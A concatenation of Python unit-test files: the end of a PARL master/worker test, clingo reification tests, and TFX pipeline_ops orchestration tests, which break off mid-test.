th = threading.Thread(target=master.run)
th.start()
time.sleep(3)
worker1 = Worker('localhost:{}'.format(port), 1)
for _ in range(3):
if master.cpu_num == 1:
break
time.sleep(10)
self.assertEqual(1, master.cpu_num)
relative_dir = self._gen_remote_class_in_relative_path(
"relative_actor1.py")
parl.connect('localhost:{}'.format(port))
sys.path.append(relative_dir) # add relative environment path
import relative_actor1
with self.assertRaises(exceptions.RemoteError):
actor = relative_actor1.Actor()
shutil.rmtree(relative_dir)
sys.path.remove(relative_dir)
master.exit()
worker1.exit()
def test_locate_remote_file_with_relative_env_path_with_distributing_files(
self):
port = get_free_tcp_port()
master = Master(port=port)
th = threading.Thread(target=master.run)
th.start()
time.sleep(3)
worker1 = Worker('localhost:{}'.format(port), 1)
for _ in range(3):
if master.cpu_num == 1:
break
time.sleep(10)
self.assertEqual(1, master.cpu_num)
relative_dir = self._gen_remote_class_in_relative_path(
"relative_actor2.py")
parl.connect(
'localhost:{}'.format(port),
distributed_files=["{}/*".format(relative_dir)])
sys.path.append(relative_dir) # add relative environment path
import relative_actor2
actor = relative_actor2.Actor()
self.assertEqual(actor.add_one(1), 2)
shutil.rmtree(relative_dir)
sys.path.remove(relative_dir)
master.exit()
worker1.exit()
if __name__ == '__main__':
unittest.main()
|
test_reify.py
|
'''
Test cases for the reify module.
'''
import os
from tempfile import NamedTemporaryFile
from multiprocessing import Process
from unittest import TestCase
from typing import Any, Callable, Dict, Set, Union, cast
from clingo.control import Control
from clingo.symbolic_atoms import SymbolicAtom
from clingo.symbol import Function, Number, Symbol
from clingo.application import Application, clingo_main
from clingo.theory_atoms import TheoryTermType
from ..reify import Reifier, ReifiedTheory, ReifiedTheoryTerm, reify_program
from ..theory import evaluate, is_clingo_operator, is_operator
GRAMMAR = """
#theory theory {
term { + : 6, binary, left;
<? : 5, binary, left;
< : 4, unary };
&tel/0 : term, any;
&tel2/0 : term, {=}, term, head
}.
"""
THEORY = """
#theory theory {
t { + : 0, binary, left;
- : 0, unary };
&a/0 : t, {=}, t, head;
&b/0 : t, directive
}.
"""
class _Application(Application):
def __init__(self, main):
self._main = main
def main(self, control, files):
self._main(control) # nocoverage
class _AppMain:
def __init__(self, prg: str):
self._prg = prg
def __call__(self, ctl: Control):
ctl.add('base', [], self._prg) # nocoverage
ctl.ground([('base', [])]) # nocoverage
ctl.solve() # nocoverage
def _reify(prg, calculate_sccs: bool = False, reify_steps: bool = False):
if isinstance(prg, str):
symbols = reify_program(prg, calculate_sccs, reify_steps)
else:
ctl = Control()
symbols = []
reifier = Reifier(symbols.append, calculate_sccs, reify_steps)
ctl.register_observer(reifier)
prg(ctl)
return [str(sym) for sym in symbols]
def _reify_check(prg: Union[str, Callable[[Control], None]], calculate_sccs: bool = False, reify_steps: bool = False):
with NamedTemporaryFile(delete=False) as temp_out:
name_out = temp_out.name
try:
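            # Redirect the process-level stdout (fd 1) into the temporary file so
            # that the reified program printed by clingo_main (run in a separate
            # process) is captured; the original stdout is restored further below.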
fd_stdout = os.dup(1)
fd_out = os.open(name_out, os.O_WRONLY)
os.dup2(fd_out, 1)
os.close(fd_out)
args = ["--output=reify", "-Wnone"]
if calculate_sccs:
args.append('--reify-sccs')
if reify_steps:
args.append('--reify-steps')
if isinstance(prg, str):
app_main = _AppMain(prg)
else:
app_main = cast(Any, prg)
proc = Process(target=clingo_main, args=(_Application(app_main), args))
proc.start()
proc.join()
os.fsync(1)
os.dup2(fd_stdout, 1)
os.close(fd_stdout)
with open(name_out, encoding="utf8") as file_out:
return [s.rstrip('.\n') for s in file_out]
finally:
os.unlink(name_out)
def term_symbols(term: ReifiedTheoryTerm, ret: Dict[int, Symbol]) -> None:
'''
Represent arguments to theory operators using clingo's `clingo.Symbol`
class.
Theory terms are evaluated using `clingox.theory.evaluate_unary` and added
to the given dictionary using the index of the theory term as key.
'''
if term.type == TheoryTermType.Function and is_operator(term.name) and not is_clingo_operator(term.name):
term_symbols(term.arguments[0], ret)
term_symbols(term.arguments[1], ret)
elif term.index not in ret:
ret[term.index] = evaluate(term)
def visit_terms(thy: ReifiedTheory, cb: Callable[[ReifiedTheoryTerm], None]):
'''
    Visit the terms occurring in the theory atoms of the given theory.
This function does not recurse into terms.
'''
for atm in thy:
for elem in atm.elements:
for term in elem.terms:
cb(term)
cb(atm.term)
guard = atm.guard
if guard:
cb(guard[1])
def _assume(ctl: Control):
ctl.add("base", [], '{a;b}.')
ctl.ground([('base', [])])
lit_a = cast(SymbolicAtom, ctl.symbolic_atoms[Function("a")]).literal
lit_b = cast(SymbolicAtom, ctl.symbolic_atoms[Function("b")]).literal
ctl.solve(assumptions=[lit_a, lit_b])
ctl.solve(assumptions=[-lit_a, -lit_b])
def _incremental(ctl: Control):
ctl.add('step0', [], 'a :- b. b :- a. {a;b}.')
ctl.ground([('step0', [])])
ctl.solve()
ctl.add('step1', [], 'c :- d. d :- c. {c;d}.')
ctl.ground([('step1', [])])
ctl.solve()
class TestReifier(TestCase):
'''
Tests for the Reifier.
'''
def test_incremental(self):
'''
Test incremental reification.
'''
# Note: we use sets here because the reification of sccs does not
        # exactly follow what clingo does. In principle, it would be possible
# to implement this in the same fashion clingo does.
self.assertSetEqual(set(_reify(_incremental, True, True)),
set(_reify_check(_incremental, True, True)))
def test_reify(self):
'''
Test reification of different language elements.
'''
prgs = [
_assume,
GRAMMAR + '&tel { a <? b: x}. { x }.',
GRAMMAR + '&tel { a("s") <? b({2,3}) }.',
GRAMMAR + '&tel { a <? b([2,c(1)]) }.',
GRAMMAR + '&tel { a(s) <? b((2,3)) }.',
GRAMMAR + '&tel2 { a <? b } = c.',
'a :- b. b :- a. c :- d. {a; d}.',
'{ a(1); a(2) } 2. :- a(1..2).',
':- not b. {b}.',
'{ a(1..4) }. :- #count{ X: a(X) } > 2.',
'a(1..2). #show b(X): a(X).',
'1{ a(1..2) }. #minimize { X@2: a(X) }.',
'{ a(1..2)}. #show c: a(_). #show.',
'#external a. [true]',
'#external a. [false]',
'#external a. [free]',
'#heuristic a. [1,true] {a}.',
'#project c: a. { a; b; c }. #project b: a.',
'#edge (a,b): c. {c}.'
]
for prg in prgs:
self.assertListEqual(_reify(prg), _reify_check(prg))
self.assertListEqual(_reify(prg, reify_steps=True), _reify_check(prg, reify_steps=True))
self.assertListEqual(_reify(prg, calculate_sccs=True), _reify_check(prg, calculate_sccs=True))
def test_theory(self):
'''
Test the reified theory class.
'''
def get_theory(prg):
symbols = reify_program(prg)
thy = ReifiedTheory(symbols)
return list(thy)
atm1 = get_theory(THEORY + '&a { f(1+ -2): x } = z. { x }.')[0]
atm2 = get_theory(THEORY + '&a { f((1,2)): x }. { x }.')[0]
atm3 = get_theory(THEORY + '&a { f([1,2]): x }. { x }.')[0]
atm4 = get_theory(THEORY + '&a { f({1,2}): x }. { x }.')[0]
atm5 = get_theory(THEORY + '&a. { x }.')[0]
self.assertEqual(str(atm1), '&a { f((1)+(-(2))): literal_tuple(1) } = z')
self.assertEqual(str(atm2), '&a { f((1,2)): literal_tuple(1) }')
self.assertEqual(str(atm3), '&a { f([1,2]): literal_tuple(1) }')
self.assertEqual(str(atm4), '&a { f({1,2}): literal_tuple(1) }')
self.assertEqual(str(atm5), '&a')
self.assertEqual(evaluate(atm1.elements[0].terms[0]), Function('f', [Number(-1)]))
self.assertGreaterEqual(atm1.literal, 1)
dir1 = get_theory(THEORY + '&b.')[0]
self.assertEqual(dir1.literal, 0)
atms = get_theory(THEORY + '&a { 1 }. &a { 2 }. &a { 3 }.')
self.assertEqual(len(set(atms)), 3)
self.assertNotEqual(atms[0], atms[1])
self.assertNotEqual(atms[0] < atms[1],
atms[0] > atms[1])
aele = get_theory(THEORY + '&a { 1; 2; 3 }.')[0]
self.assertEqual(len(set(aele.elements)), 3)
self.assertNotEqual(aele.elements[0], aele.elements[1])
self.assertNotEqual(aele.elements[0] < aele.elements[1],
aele.elements[0] > aele.elements[1])
atup = get_theory(THEORY + '&a { 1,2,3 }.')[0]
self.assertEqual(len(set(atup.elements[0].terms)), 3)
self.assertNotEqual(atup.elements[0].terms[0], atup.elements[0].terms[1])
self.assertNotEqual(atup.elements[0].terms[0] < atup.elements[0].terms[1],
atup.elements[0].terms[0] > atup.elements[0].terms[1])
def test_theory_symbols(self):
"""
Test function to get symbols in a theory.
"""
def theory_symbols(prg: str) -> Set[str]:
ret: Dict[int, Symbol] = {}
visit_terms(ReifiedTheory(reify_program(prg)),
lambda term: term_symbols(term, ret))
return set(str(x) for x in ret.values())
prg = GRAMMAR + '&tel { a(s) <? b((2,3)) }.'
self.assertSetEqual(theory_symbols(prg),
set(['a(s)', 'b((2,3))', 'tel']))
prg = GRAMMAR + '&tel2 { (a("s") <? 2+3) <? b((2,3)) } = z.'
self.assertSetEqual(theory_symbols(prg),
set(['5', 'a("s")', 'z', 'tel2', 'b((2,3))']))
prg = GRAMMAR + '&tel{ a({b,c}) <? c}.'
self.assertRaises(RuntimeError, theory_symbols, prg)
|
pipeline_ops_test.py
|
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tfx.orchestration.experimental.core.pipeline_ops."""
import copy
import os
import threading
import time
from absl.testing import parameterized
from absl.testing.absltest import mock
import tensorflow as tf
from tfx.orchestration import metadata
from tfx.orchestration.experimental.core import async_pipeline_task_gen
from tfx.orchestration.experimental.core import pipeline_ops
from tfx.orchestration.experimental.core import pipeline_state as pstate
from tfx.orchestration.experimental.core import service_jobs
from tfx.orchestration.experimental.core import sync_pipeline_task_gen
from tfx.orchestration.experimental.core import task as task_lib
from tfx.orchestration.experimental.core import task_gen_utils
from tfx.orchestration.experimental.core import task_queue as tq
from tfx.orchestration.experimental.core import test_utils
from tfx.orchestration.portable.mlmd import execution_lib
from tfx.proto.orchestration import pipeline_pb2
from tfx.utils import status as status_lib
from ml_metadata.proto import metadata_store_pb2
def _test_pipeline(pipeline_id,
execution_mode: pipeline_pb2.Pipeline.ExecutionMode = (
pipeline_pb2.Pipeline.ASYNC)):
pipeline = pipeline_pb2.Pipeline()
pipeline.pipeline_info.id = pipeline_id
pipeline.execution_mode = execution_mode
if execution_mode == pipeline_pb2.Pipeline.SYNC:
pipeline.runtime_spec.pipeline_run_id.field_value.string_value = 'run0'
return pipeline
class PipelineOpsTest(test_utils.TfxTest, parameterized.TestCase):
def setUp(self):
super(PipelineOpsTest, self).setUp()
pipeline_root = os.path.join(
os.environ.get('TEST_UNDECLARED_OUTPUTS_DIR', self.get_temp_dir()),
self.id())
# Makes sure multiple connections within a test always connect to the same
# MLMD instance.
metadata_path = os.path.join(pipeline_root, 'metadata', 'metadata.db')
self._metadata_path = metadata_path
connection_config = metadata.sqlite_metadata_connection_config(
metadata_path)
connection_config.sqlite.SetInParent()
self._mlmd_connection = metadata.Metadata(
connection_config=connection_config)
@parameterized.named_parameters(
dict(testcase_name='async', pipeline=_test_pipeline('pipeline1')),
dict(
testcase_name='sync',
pipeline=_test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC)))
def test_initiate_pipeline_start(self, pipeline):
with self._mlmd_connection as m:
# Initiate a pipeline start.
with pipeline_ops.initiate_pipeline_start(m, pipeline) as pipeline_state1:
self.assertProtoPartiallyEquals(
pipeline, pipeline_state1.pipeline, ignored_fields=['runtime_spec'])
self.assertEqual(metadata_store_pb2.Execution.NEW,
pipeline_state1.execution.last_known_state)
# Initiate another pipeline start.
pipeline2 = _test_pipeline('pipeline2')
with pipeline_ops.initiate_pipeline_start(m,
pipeline2) as pipeline_state2:
self.assertEqual(pipeline2, pipeline_state2.pipeline)
self.assertEqual(metadata_store_pb2.Execution.NEW,
pipeline_state2.execution.last_known_state)
# Error if attempted to initiate when old one is active.
with self.assertRaises(status_lib.StatusNotOkError) as exception_context:
pipeline_ops.initiate_pipeline_start(m, pipeline)
self.assertEqual(status_lib.Code.ALREADY_EXISTS,
exception_context.exception.code)
# Fine to initiate after the previous one is inactive.
with pipeline_state1:
execution = pipeline_state1.execution
execution.last_known_state = metadata_store_pb2.Execution.COMPLETE
with pipeline_ops.initiate_pipeline_start(m, pipeline) as pipeline_state3:
self.assertEqual(metadata_store_pb2.Execution.NEW,
pipeline_state3.execution.last_known_state)
@parameterized.named_parameters(
dict(testcase_name='async', pipeline=_test_pipeline('pipeline1')),
dict(
testcase_name='sync',
pipeline=_test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC)))
def test_stop_pipeline_non_existent_or_inactive(self, pipeline):
with self._mlmd_connection as m:
# Stop pipeline without creating one.
with self.assertRaises(status_lib.StatusNotOkError) as exception_context:
pipeline_ops.stop_pipeline(m,
task_lib.PipelineUid.from_pipeline(pipeline))
self.assertEqual(status_lib.Code.NOT_FOUND,
exception_context.exception.code)
# Initiate pipeline start and mark it completed.
pipeline_ops.initiate_pipeline_start(m, pipeline)
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
pipeline_state.initiate_stop(status_lib.Status(code=status_lib.Code.OK))
pipeline_state.execution.last_known_state = (
metadata_store_pb2.Execution.COMPLETE)
# Try to initiate stop again.
with self.assertRaises(status_lib.StatusNotOkError) as exception_context:
pipeline_ops.stop_pipeline(m, pipeline_uid)
self.assertEqual(status_lib.Code.NOT_FOUND,
exception_context.exception.code)
@parameterized.named_parameters(
dict(testcase_name='async', pipeline=_test_pipeline('pipeline1')),
dict(
testcase_name='sync',
pipeline=_test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC)))
def test_stop_pipeline_wait_for_inactivation(self, pipeline):
with self._mlmd_connection as m:
pipeline_state = pipeline_ops.initiate_pipeline_start(m, pipeline)
def _inactivate(pipeline_state):
time.sleep(2.0)
with pipeline_ops._PIPELINE_OPS_LOCK:
with pipeline_state:
execution = pipeline_state.execution
execution.last_known_state = metadata_store_pb2.Execution.COMPLETE
thread = threading.Thread(target=_inactivate, args=(pipeline_state,))
thread.start()
pipeline_ops.stop_pipeline(
m, task_lib.PipelineUid.from_pipeline(pipeline), timeout_secs=10.0)
thread.join()
@parameterized.named_parameters(
dict(testcase_name='async', pipeline=_test_pipeline('pipeline1')),
dict(
testcase_name='sync',
pipeline=_test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC)))
def test_stop_pipeline_wait_for_inactivation_timeout(self, pipeline):
with self._mlmd_connection as m:
pipeline_ops.initiate_pipeline_start(m, pipeline)
with self.assertRaisesRegex(
status_lib.StatusNotOkError,
'Timed out.*waiting for execution inactivation.'
) as exception_context:
pipeline_ops.stop_pipeline(
m, task_lib.PipelineUid.from_pipeline(pipeline), timeout_secs=1.0)
self.assertEqual(status_lib.Code.DEADLINE_EXCEEDED,
exception_context.exception.code)
def test_stop_node_no_active_executions(self):
pipeline = pipeline_pb2.Pipeline()
self.load_proto_from_text(
os.path.join(
os.path.dirname(__file__), 'testdata', 'async_pipeline.pbtxt'),
pipeline)
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
node_uid = task_lib.NodeUid(node_id='my_trainer', pipeline_uid=pipeline_uid)
with self._mlmd_connection as m:
pstate.PipelineState.new(m, pipeline)
pipeline_ops.stop_node(m, node_uid)
pipeline_state = pstate.PipelineState.load(m, pipeline_uid)
# The node should be stop-initiated even when node is inactive to prevent
# future triggers.
with pipeline_state:
self.assertEqual(
status_lib.Code.CANCELLED,
pipeline_state.node_stop_initiated_reason(node_uid).code)
# Restart node.
pipeline_state = pipeline_ops.initiate_node_start(m, node_uid)
with pipeline_state:
self.assertIsNone(pipeline_state.node_stop_initiated_reason(node_uid))
def test_stop_node_wait_for_inactivation(self):
pipeline = pipeline_pb2.Pipeline()
self.load_proto_from_text(
os.path.join(
os.path.dirname(__file__), 'testdata', 'async_pipeline.pbtxt'),
pipeline)
trainer = pipeline.nodes[2].pipeline_node
test_utils.fake_component_output(
self._mlmd_connection, trainer, active=True)
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
node_uid = task_lib.NodeUid(node_id='my_trainer', pipeline_uid=pipeline_uid)
with self._mlmd_connection as m:
pstate.PipelineState.new(m, pipeline)
def _inactivate(execution):
time.sleep(2.0)
with pipeline_ops._PIPELINE_OPS_LOCK:
execution.last_known_state = metadata_store_pb2.Execution.COMPLETE
m.store.put_executions([execution])
execution = task_gen_utils.get_executions(m, trainer)[0]
thread = threading.Thread(
target=_inactivate, args=(copy.deepcopy(execution),))
thread.start()
pipeline_ops.stop_node(m, node_uid, timeout_secs=5.0)
thread.join()
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
self.assertEqual(
status_lib.Code.CANCELLED,
pipeline_state.node_stop_initiated_reason(node_uid).code)
# Restart node.
with pipeline_ops.initiate_node_start(m, node_uid) as pipeline_state:
self.assertIsNone(pipeline_state.node_stop_initiated_reason(node_uid))
def test_stop_node_wait_for_inactivation_timeout(self):
pipeline = pipeline_pb2.Pipeline()
self.load_proto_from_text(
os.path.join(
os.path.dirname(__file__), 'testdata', 'async_pipeline.pbtxt'),
pipeline)
trainer = pipeline.nodes[2].pipeline_node
test_utils.fake_component_output(
self._mlmd_connection, trainer, active=True)
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
node_uid = task_lib.NodeUid(node_id='my_trainer', pipeline_uid=pipeline_uid)
with self._mlmd_connection as m:
pstate.PipelineState.new(m, pipeline)
with self.assertRaisesRegex(
status_lib.StatusNotOkError,
'Timed out.*waiting for execution inactivation.'
) as exception_context:
pipeline_ops.stop_node(m, node_uid, timeout_secs=1.0)
self.assertEqual(status_lib.Code.DEADLINE_EXCEEDED,
exception_context.exception.code)
# Even if `wait_for_inactivation` times out, the node should be stop
# initiated to prevent future triggers.
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
self.assertEqual(
status_lib.Code.CANCELLED,
pipeline_state.node_stop_initiated_reason(node_uid).code)
@mock.patch.object(sync_pipeline_task_gen, 'SyncPipelineTaskGenerator')
@mock.patch.object(async_pipeline_task_gen, 'AsyncPipelineTaskGenerator')
def test_orchestrate_active_pipelines(self, mock_async_task_gen,
mock_sync_task_gen):
with self._mlmd_connection as m:
# Sync and async active pipelines.
async_pipelines = [
_test_pipeline('pipeline1'),
_test_pipeline('pipeline2'),
]
sync_pipelines = [
_test_pipeline('pipeline3', pipeline_pb2.Pipeline.SYNC),
_test_pipeline('pipeline4', pipeline_pb2.Pipeline.SYNC),
]
for pipeline in async_pipelines + sync_pipelines:
pipeline_ops.initiate_pipeline_start(m, pipeline)
# Active executions for active async pipelines.
mock_async_task_gen.return_value.generate.side_effect = [
[
test_utils.create_exec_node_task(
task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid.from_pipeline(
async_pipelines[0]),
node_id='Transform'))
],
[
test_utils.create_exec_node_task(
task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid.from_pipeline(
async_pipelines[1]),
node_id='Trainer'))
],
]
# Active executions for active sync pipelines.
mock_sync_task_gen.return_value.generate.side_effect = [
[
test_utils.create_exec_node_task(
task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid.from_pipeline(
sync_pipelines[0]),
node_id='Trainer'))
],
[
test_utils.create_exec_node_task(
task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid.from_pipeline(
sync_pipelines[1]),
node_id='Validator'))
],
]
task_queue = tq.TaskQueue()
pipeline_ops.orchestrate(m, task_queue,
service_jobs.DummyServiceJobManager())
self.assertEqual(2, mock_async_task_gen.return_value.generate.call_count)
self.assertEqual(2, mock_sync_task_gen.return_value.generate.call_count)
# Verify that tasks are enqueued in the expected order.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual(
test_utils.create_node_uid('pipeline1', 'Transform'), task.node_uid)
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual(
test_utils.create_node_uid('pipeline2', 'Trainer'), task.node_uid)
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual(
test_utils.create_node_uid('pipeline3', 'Trainer'), task.node_uid)
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual(
test_utils.create_node_uid('pipeline4', 'Validator'), task.node_uid)
self.assertTrue(task_queue.is_empty())
@parameterized.parameters(
_test_pipeline('pipeline1'),
_test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC))
@mock.patch.object(sync_pipeline_task_gen, 'SyncPipelineTaskGenerator')
@mock.patch.object(async_pipeline_task_gen, 'AsyncPipelineTaskGenerator')
@mock.patch.object(task_gen_utils, 'generate_task_from_active_execution')
def test_stop_initiated_pipelines(self, pipeline, mock_gen_task_from_active,
mock_async_task_gen, mock_sync_task_gen):
with self._mlmd_connection as m:
pipeline.nodes.add().pipeline_node.node_info.id = 'ExampleGen'
pipeline.nodes.add().pipeline_node.node_info.id = 'Transform'
pipeline.nodes.add().pipeline_node.node_info.id = 'Trainer'
pipeline.nodes.add().pipeline_node.node_info.id = 'Evaluator'
mock_service_job_manager = mock.create_autospec(
service_jobs.ServiceJobManager, instance=True)
mock_service_job_manager.is_pure_service_node.side_effect = (
lambda _, node_id: node_id == 'ExampleGen')
mock_service_job_manager.is_mixed_service_node.side_effect = (
lambda _, node_id: node_id == 'Transform')
pipeline_ops.initiate_pipeline_start(m, pipeline)
with pstate.PipelineState.load(
m, task_lib.PipelineUid.from_pipeline(pipeline)) as pipeline_state:
pipeline_state.initiate_stop(
status_lib.Status(code=status_lib.Code.CANCELLED))
pipeline_execution_id = pipeline_state.execution.id
task_queue = tq.TaskQueue()
# For the stop-initiated pipeline, "Transform" execution task is in queue,
# "Trainer" has an active execution in MLMD but no task in queue,
# "Evaluator" has no active execution.
task_queue.enqueue(
test_utils.create_exec_node_task(
task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid.from_pipeline(pipeline),
node_id='Transform')))
transform_task = task_queue.dequeue() # simulates task being processed
mock_gen_task_from_active.side_effect = [
test_utils.create_exec_node_task(
node_uid=task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid.from_pipeline(pipeline),
node_id='Trainer'),
is_cancelled=True), None, None, None, None
]
pipeline_ops.orchestrate(m, task_queue, mock_service_job_manager)
# There are no active pipelines so these shouldn't be called.
mock_async_task_gen.assert_not_called()
mock_sync_task_gen.assert_not_called()
# stop_node_services should be called for ExampleGen which is a pure
# service node.
mock_service_job_manager.stop_node_services.assert_called_once_with(
mock.ANY, 'ExampleGen')
mock_service_job_manager.reset_mock()
task_queue.task_done(transform_task) # Pop out transform task.
# CancelNodeTask for the "Transform" ExecNodeTask should be next.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_cancel_node_task(task))
self.assertEqual('Transform', task.node_uid.node_id)
# ExecNodeTask (with is_cancelled=True) for "Trainer" is next.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual('Trainer', task.node_uid.node_id)
self.assertTrue(task.is_cancelled)
self.assertTrue(task_queue.is_empty())
mock_gen_task_from_active.assert_has_calls([
mock.call(
m,
pipeline_state.pipeline,
pipeline.nodes[2].pipeline_node,
mock.ANY,
is_cancelled=True),
mock.call(
m,
pipeline_state.pipeline,
pipeline.nodes[3].pipeline_node,
mock.ANY,
is_cancelled=True)
])
self.assertEqual(2, mock_gen_task_from_active.call_count)
# Pipeline execution should continue to be active since active node
# executions were found in the last call to `orchestrate`.
[execution] = m.store.get_executions_by_id([pipeline_execution_id])
self.assertTrue(execution_lib.is_execution_active(execution))
# Call `orchestrate` again; this time there are no more active node
# executions so the pipeline should be marked as cancelled.
pipeline_ops.orchestrate(m, task_queue, mock_service_job_manager)
self.assertTrue(task_queue.is_empty())
[execution] = m.store.get_executions_by_id([pipeline_execution_id])
self.assertEqual(metadata_store_pb2.Execution.CANCELED,
execution.last_known_state)
# stop_node_services should be called on both ExampleGen and Transform
# which are service nodes.
mock_service_job_manager.stop_node_services.assert_has_calls(
[mock.call(mock.ANY, 'ExampleGen'),
mock.call(mock.ANY, 'Transform')],
any_order=True)
@mock.patch.object(async_pipeline_task_gen, 'AsyncPipelineTaskGenerator')
@mock.patch.object(task_gen_utils, 'generate_task_from_active_execution')
def test_active_pipelines_with_stop_initiated_nodes(self,
mock_gen_task_from_active,
mock_async_task_gen):
with self._mlmd_connection as m:
pipeline = _test_pipeline('pipeline')
pipeline.nodes.add().pipeline_node.node_info.id = 'ExampleGen'
pipeline.nodes.add().pipeline_node.node_info.id = 'Transform'
pipeline.nodes.add().pipeline_node.node_info.id = 'Trainer'
pipeline.nodes.add().pipeline_node.node_info.id = 'Evaluator'
mock_service_job_manager = mock.create_autospec(
service_jobs.ServiceJobManager, instance=True)
mock_service_job_manager.is_pure_service_node.side_effect = (
lambda _, node_id: node_id == 'ExampleGen')
example_gen_node_uid = task_lib.NodeUid.from_pipeline_node(
pipeline, pipeline.nodes[0].pipeline_node)
transform_node_uid = task_lib.NodeUid.from_pipeline_node(
pipeline, pipeline.nodes[1].pipeline_node)
transform_task = test_utils.create_exec_node_task(
node_uid=transform_node_uid)
trainer_node_uid = task_lib.NodeUid.from_pipeline_node(
pipeline, pipeline.nodes[2].pipeline_node)
trainer_task = test_utils.create_exec_node_task(node_uid=trainer_node_uid)
evaluator_node_uid = task_lib.NodeUid.from_pipeline_node(
pipeline, pipeline.nodes[3].pipeline_node)
evaluator_task = test_utils.create_exec_node_task(
node_uid=evaluator_node_uid)
cancelled_evaluator_task = test_utils.create_exec_node_task(
node_uid=evaluator_node_uid, is_cancelled=True)
pipeline_ops.initiate_pipeline_start(m, pipeline)
with pstate.PipelineState.load(
m, task_lib.PipelineUid.from_pipeline(pipeline)) as pipeline_state:
# Stop example-gen, trainer and evaluator.
pipeline_state.initiate_node_stop(
example_gen_node_uid,
status_lib.Status(code=status_lib.Code.CANCELLED))
pipeline_state.initiate_node_stop(
trainer_node_uid, status_lib.Status(code=status_lib.Code.CANCELLED))
pipeline_state.initiate_node_stop(
evaluator_node_uid, status_lib.Status(code=status_lib.Code.ABORTED))
task_queue = tq.TaskQueue()
# Simulate a new transform execution being triggered.
mock_async_task_gen.return_value.generate.return_value = [transform_task]
# Simulate ExecNodeTask for trainer already present in the task queue.
task_queue.enqueue(trainer_task)
# Simulate Evaluator having an active execution in MLMD.
mock_gen_task_from_active.side_effect = [evaluator_task]
pipeline_ops.orchestrate(m, task_queue, mock_service_job_manager)
self.assertEqual(1, mock_async_task_gen.return_value.generate.call_count)
# stop_node_services should be called on example-gen which is a pure
# service node.
mock_service_job_manager.stop_node_services.assert_called_once_with(
mock.ANY, 'ExampleGen')
# Verify that tasks are enqueued in the expected order:
# Pre-existing trainer task.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertEqual(trainer_task, task)
# CancelNodeTask for trainer.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_cancel_node_task(task))
self.assertEqual(trainer_node_uid, task.node_uid)
# ExecNodeTask with is_cancelled=True for evaluator.
task = task_queue.dequeue()
task_queue.task_done(task)
      self.assertEqual(cancelled_evaluator_task, task)
# ExecNodeTask for newly triggered transform node.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertEqual(transform_task, task)
# No more tasks.
self.assertTrue(task_queue.is_empty())
@mock.patch.object(sync_pipeline_task_gen, 'SyncPipelineTaskGenerator')
def test_handling_finalize_pipeline_task(self, task_gen):
with self._mlmd_connection as m:
pipeline = _test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC)
pipeline_ops.initiate_pipeline_start(m, pipeline)
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
finalize_reason = status_lib.Status(
code=status_lib.Code.ABORTED, message='foo bar')
task_gen.return_value.generate.side_effect = [
[
task_lib.FinalizePipelineTask(
pipeline_uid=pipeline_uid, status=finalize_reason)
],
]
task_queue = tq.TaskQueue()
pipeline_ops.orchestrate(m, task_queue,
service_jobs.DummyServiceJobManager())
task_gen.return_value.generate.assert_called_once()
self.assertTrue(task_queue.is_empty())
# Load pipeline state and verify stop initiation.
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
self.assertEqual(finalize_reason,
pipeline_state.stop_initiated_reason())
@mock.patch.object(async_pipeline_task_gen, 'AsyncPipelineTaskGenerator')
def test_handling_finalize_node_task(self, task_gen):
with self._mlmd_connection as m:
pipeline = _test_pipeline('pipeline1')
pipeline.nodes.add().pipeline_node.node_info.id = 'Transform'
pipeline.nodes.add().pipeline_node.node_info.id = 'Trainer'
pipeline_ops.initiate_pipeline_start(m, pipeline)
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
finalize_reason = status_lib.Status(
code=status_lib.Code.ABORTED, message='foo bar')
task_gen.return_value.generate.side_effect = [
[
test_utils.create_exec_node_task(
task_lib.NodeUid(
pipeline_uid=pipeline_uid, node_id='Transform')),
task_lib.FinalizeNodeTask(
node_uid=task_lib.NodeUid(
pipeline_uid=pipeline_uid, node_id='Trainer'),
status=finalize_reason)
],
]
task_queue = tq.TaskQueue()
pipeline_ops.orchestrate(m, task_queue,
service_jobs.DummyServiceJobManager())
task_gen.return_value.generate.assert_called_once()
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual(
